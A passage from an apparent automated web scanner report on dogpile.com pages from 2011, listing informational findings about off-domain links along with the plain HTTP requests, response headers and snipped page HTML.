<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="dpInfoGraphicContainer">
                   <img alt="Metasearch study" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_about_infographic.gif/_iceUrlFlag=15?_IceUrl=true" />
                   <div id="dpInfoGraphicMarkup">
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.30. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_about_infographic.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=04def62386584349a2bfc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:26 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:26 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:26 GMT
Connection: close
Content-Length: 45389
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="about, about us, metasearch, meta search, metasearch study, search engine, search, google,yahoo, bing, dogpile, dogpile.com, infospace"/>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="dpInfoGraphicContainer">
                   <img alt="Metasearch study" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_about_infographic.gif/_iceUrlFlag=15?_IceUrl=true" />
                   <div id="dpInfoGraphicMarkup">
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.31. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/About-arfie2.jpg/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=7bf15bbd815545118e35c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:26 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:26 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:26 GMT
Connection: close
Content-Length: 40937
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="" />

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<p>
               <img id="icePage_AboutArfieAlbum" title="About Arfie" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/About-arfie2.jpg/_iceUrlFlag=15?_IceUrl=true" alt="About Arfie" style="border-width:0px;" />
           </p>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.32. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/about_results_example.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=e4b1911b6dcc4596925ac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:48 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:48 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:48 GMT
Connection: close
Content-Length: 42121
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="about search, history, search engines"/>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<p>
                <img alt="Results Example" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/about_results_example.gif/_iceUrlFlag=15?_IceUrl=true" />
               </p>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.33. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
